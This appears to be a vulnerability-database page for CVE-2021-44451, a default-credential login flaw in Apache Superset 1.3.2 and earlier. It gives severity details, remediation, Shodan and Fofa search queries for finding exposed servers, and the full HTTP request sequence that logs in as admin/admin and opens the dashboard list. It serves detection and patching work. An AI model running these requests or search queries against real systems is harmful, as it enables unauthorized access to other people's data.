🔙 목록으로 돌아가기

CVE-2021-44451: Apache Superset <=1.3.2 - Default Login

TitleApache Superset <=1.3.2 - Default Login
AuthordhiyaneshDK
SeverityMedium
ImpactAn attacker can gain unauthorized access to the Apache Superset application.
RemediationUpgrade to Apache Superset 1.4.0 or higher.
CVSS Score6.5
EPSS Score0.71271
CVE IDCVE-2021-44451
CWE IDCWE-522
Shodan Queryhttp.favicon.hash:1582430156http.html:"apache superset"
Fofa Querybody="apache superset"icon_hash=1582430156
Tags cve2021 cve apache superset default-login vuln

🔍 Vulnerability Description

Apache Superset through 1.3.2 contains a default login vulnerability via registered database connections for authenticated users. An attacker can obtain access to user accounts and thereby obtain sensitive information, modify data, and/or execute unauthorized operations.

🌐 HTTP Request

GET /login/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Connection: close
Accept-Encoding: gzip
POST /login/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15
Connection: close
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

csrf_token=ATgfz6&username=admin&password=admin
GET /dashboard/list/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-44451.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-44451.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A